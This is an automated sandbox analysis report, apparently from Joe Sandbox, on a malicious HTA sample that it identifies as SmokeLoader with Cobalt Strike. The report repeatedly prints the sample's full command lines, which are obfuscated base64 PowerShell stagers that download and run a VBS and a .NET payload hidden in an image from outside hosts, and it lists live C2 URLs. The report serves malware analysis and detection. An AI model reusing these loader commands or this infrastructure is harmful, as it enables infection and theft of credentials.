Edit tour

Windows Analysis Report
begoodforeverythinggreatthingsformebetterforgood.hta

Overview

General Information

Sample name:	begoodforeverythinggreatthingsformebetterforgood.hta
Analysis ID:	1585851
MD5:	b7bd51ea4a3cbb85901f5e467009beaa
SHA1:	2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
SHA256:	4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
Tags:	htauser-lontze7
Infos:

Detection

Cobalt Strike, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Powershell download and load assembly

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected obfuscated html page

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if browser processes are running

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to compare user and computer (likely to detect sandboxes)

Creates a thread in another existing process (thread injection)

Found evasive API chain (may stop execution after checking mutex)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query CPU information (cpuid)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7452 cmdline: mshta.exe "C:\Users\user\Desktop\begoodforeverythinggreatthingsformebetterforgood.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 7520 cmdline: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7608 cmdline: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 7772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 7900 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 7948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_compiler.exe (PID: 5816 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 7272 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7788 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 7868 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7968 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7912 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

WerFault.exe (PID: 7676 cmdline: C:\Windows\system32\WerFault.exe -u -p 7912 -s 420 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

explorer.exe (PID: 7944 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 7728 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

explorer.exe (PID: 7568 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 6100 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

icgfugf (PID: 7700 cmdline: C:\Users\user\AppData\Roaming\icgfugf MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

icgfugf (PID: 5844 cmdline: C:\Users\user\AppData\Roaming\icgfugf MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
begoodforeverythinggreatthingsformebetterforgood.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: wscript.exe PID: 7900	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7948	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 7948	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x87b:$b2: ::FromBase64String( 0x1002:$b2: ::FromBase64String( 0xa19b:$b2: ::FromBase64String( 0x4ba48c:$b2: ::FromBase64String( 0x4bb3e1:$b2: ::FromBase64String( 0x517536:$b2: ::FromBase64String( 0x517c7c:$b2: ::FromBase64String( 0x561f7a:$b2: ::FromBase64String( 0x5a425f:$b2: ::FromBase64String( 0x5a49e6:$b2: ::FromBase64String( 0x9acf68:$b2: ::FromBase64String( 0xaaefb4:$b2: ::FromBase64String( 0xaaf73b:$b2: ::FromBase64String( 0xb48b32:$b2: ::FromBase64String( 0xb492b9:$b2: ::FromBase64String( 0x6b4:$b3: ::UTF8.GetString( 0xe3b:$b3: ::UTF8.GetString( 0x9fd4:$b3: ::UTF8.GetString( 0x4ba2c5:$b3: ::UTF8.GetString( 0x4bb21a:$b3: ::UTF8.GetString( 0x51736f:$b3: ::UTF8.GetString(
Process Memory Space: explorer.exe PID: 7944	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Process Memory Space: explorer.exe PID: 7728	JoeSecurity_SmokeLoader	Yara detected SmokeLoader	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
8.2.powershell.exe.643a1f0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_7948.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagemen

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7608, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" , ProcessId: 7900, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[